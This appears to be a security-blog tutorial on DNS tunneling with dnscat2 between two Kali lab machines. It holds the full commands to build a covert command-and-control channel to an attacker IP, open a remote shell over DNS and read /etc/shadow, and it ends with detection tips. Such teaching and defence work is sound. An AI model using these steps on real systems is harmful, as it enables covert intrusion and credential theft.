DNS Tunneling with dnscat2 tool in Kali Linux

DNS-Tunneling-with-dnscat2-tool-in-Kali-Linux

DNS tunneling is a technique used to transfer data or establish a Command and Control (C2) channel by abusing the DNS protocol. Since DNS traffic is commonly allowed through firewalls and security devices, attackers may use it to communicate with compromised systems or exfiltrate sensitive information while blending with legitimate network traffic.

In this tutorial, you will learn how to perform DNS tunneling using dnscat2 in Kali Linux by setting up a dnscat2 server on the attacker machine and a dnscat2 client on the target machine. You will also see how to establish an encrypted communication channel and interact with the target system through a shell in a controlled lab environment.

Disclaimer: This tutorial is intended only for educational purposes and authorized penetration testing in a lab environment. Never use these techniques against systems without explicit permission.

Understanding How DNS Works

Whenever you type a website address such as: https://example.com

your computer sends a DNS query requesting the IP address associated with that domain.

The DNS server responds with something similar to: example.com → 192.168.1.10

Your computer then communicates with that IP address.

Normally, DNS only resolves domain names. However, tools like dnscat2 tunnel encrypted data inside DNS queries and responses, allowing two systems to communicate covertly.

What is dnscat2?

dnscat2 is an open-source DNS tunneling framework that creates an encrypted communication channel over DNS.

It consists of two components:

  • dnscat2-server (Attacker)
  • dnscat2-client (Target)

After the client connects to the server, the attacker can manage sessions, open shells, execute commands, and transfer information through DNS traffic.

Lab Environment

For demonstration purposes, two Kali Linux virtual machines are used.

Machine Role IP Address
Attacker Machine dnscat2 Server 192.168.148.134
Target Machine dnscat2 Client 192.168.148.136

Step 1: Download dnscat2

On the attacker Kali machine, clone the official GitHub repository.

DNS-Tunneling-with-dnscat2-tool-in-Kali-Linux-1

$ cd Desktop
$ git clone https://github.com/iagox86/dnscat2.git

DNS-Tunneling-with-dnscat2-tool-in-Kali-Linux-2

Verify the download.

$ ls

DNS-Tunneling-with-dnscat2-tool-in-Kali-Linux-3

Move inside the project directory.

$ cd dnscat2

Step 2: Install dnscat2 Server

Navigate to the server directory.

$ cd server

DNS-Tunneling-with-dnscat2-tool-in-Kali-Linux-4

Install Bundler.

$ sudo gem install bundler

DNS-Tunneling-with-dnscat2-tool-in-Kali-Linux-5

Install the required Ruby dependencies.

$ sudo bundle install

DNS-Tunneling-with-dnscat2-tool-in-Kali-Linux-6

The dnscat2 server is now ready.

Step 3: Install dnscat2 Client

On the target Kali machine, clone the repository.

# git clone https://github.com/iagox86/dnscat2.git

DNS-Tunneling-with-dnscat2-tool-in-Kali-Linux-7

Navigate to the client directory.

# cd dnscat2
# ls
# cd client
# ls

DNS-Tunneling-with-dnscat2-tool-in-Kali-Linux-8

Compile the client.

# make

DNS-Tunneling-with-dnscat2-tool-in-Kali-Linux-9

The client installation is complete.

DNS-Tunneling-with-dnscat2-tool-in-Kali-Linux-10

Step 4: Start the dnscat2 Server

On the attacker machine, launch the server.

$ ruby ./dnscat2.rb

DNS-Tunneling-with-dnscat2-tool-in-Kali-Linux-11

Once started, dnscat2 displays a command similar to: ./dnscat --dns server=x.x.x.x,port=53

This command is used by the client to connect to the server.

If the dnscat2 prompt does not appear automatically, simply press Enter.

Step 5: Connect the Client

On the target machine, execute:

# ./dnscat --dns server=192.168.148.134,port=53

DNS-Tunneling-with-dnscat2-tool-in-Kali-Linux-12

Here,

  • 192.168.148.134 is the attacker machine.
  • 53 is the default DNS port.

After execution, both systems display the same session identifier, confirming a successful encrypted connection.

DNS-Tunneling-with-dnscat2-tool-in-Kali-Linux-13

Step 6: Verify Active Sessions

On the server prompt, display available commands.

help

DNS-Tunneling-with-dnscat2-tool-in-Kali-Linux-14

List active sessions.

windows
or
sessions

DNS-Tunneling-with-dnscat2-tool-in-Kali-Linux-15

You should see one connected Kali client.

Select the session.

window -i 1
or
session -i 1

DNS-Tunneling-with-dnscat2-tool-in-Kali-Linux-16

The prompt changes to: command (kali) 1>

Step 7: Monitor DNS Traffic

Launch Wireshark on the client machine.

# wireshark

Select the active network interface (for example eth0).

DNS-Tunneling-with-dnscat2-tool-in-Kali-Linux-17

Apply the display filter:

dns

DNS-Tunneling-with-dnscat2-tool-in-Kali-Linux-18

You will observe continuous DNS requests and responses between the attacker and target, demonstrating the DNS tunnel.

Step 8: Create a Shell Session

From the connected session on the attacker machine, execute:

shell

DNS-Tunneling-with-dnscat2-tool-in-Kali-Linux-19

Return to the main prompt.

back

DNS-Tunneling-with-dnscat2-tool-in-Kali-Linux-20

List available windows.

windows

DNS-Tunneling-with-dnscat2-tool-in-Kali-Linux-21

You will now notice two active windows.

Connect to the shell window.

window -i 2

DNS-Tunneling-with-dnscat2-tool-in-Kali-Linux-22

You are now interacting directly with the target system.

Step 9: Execute Commands on the Target

Verify the logged-in user.

  • The command displays the username of the currently logged-in user.
  • If you are logged in as the root user, the output will be: root
whoami

DNS-Tunneling-with-dnscat2-tool-in-Kali-Linux-23

List files.

ls

DNS-Tunneling-with-dnscat2-tool-in-Kali-Linux-24

Move to the Desktop.

cd /root/Desktop

DNS-Tunneling-with-dnscat2-tool-in-Kali-Linux-25

Create a directory.

mkdir testfolder

DNS-Tunneling-with-dnscat2-tool-in-Kali-Linux-26

Although no output is displayed, the folder is created successfully on the target machine.

DNS-Tunneling-with-dnscat2-tool-in-Kali-Linux-27

Additional useful commands include:

ifconfig
uname -a
cat /etc/passwd
cat /etc/shadow

These commands demonstrate remote interaction through the DNS tunnel in the lab environment.

Security Detection Tips

Security teams can identify potential DNS tunneling activity by monitoring:

  • Unusually high volumes of DNS queries.
  • Long or random-looking DNS subdomains.
  • Continuous DNS requests to a single domain.
  • Large TXT record exchanges.
  • DNS traffic occurring outside normal business patterns.
  • DNS communication with suspicious or unknown domains.
  • High DNS query entropy indicating encoded or encrypted data.

Modern SIEM solutions, IDS/IPS platforms, and DNS security tools can help detect these anomalies.

dnscat2 is a powerful DNS tunneling framework that demonstrates how attackers can establish an encrypted command-and-control channel over the DNS protocol. In this tutorial, you learned how to install the dnscat2 server and client, establish an encrypted DNS session, monitor DNS traffic with Wireshark, and interact with the target machine through a remote shell in a controlled lab.

While DNS tunneling is a valuable technique for penetration testing and red team exercises, it also highlights the importance of monitoring DNS traffic, implementing DNS security controls, and detecting abnormal DNS behavior to prevent data exfiltration and covert communications.

Related Posts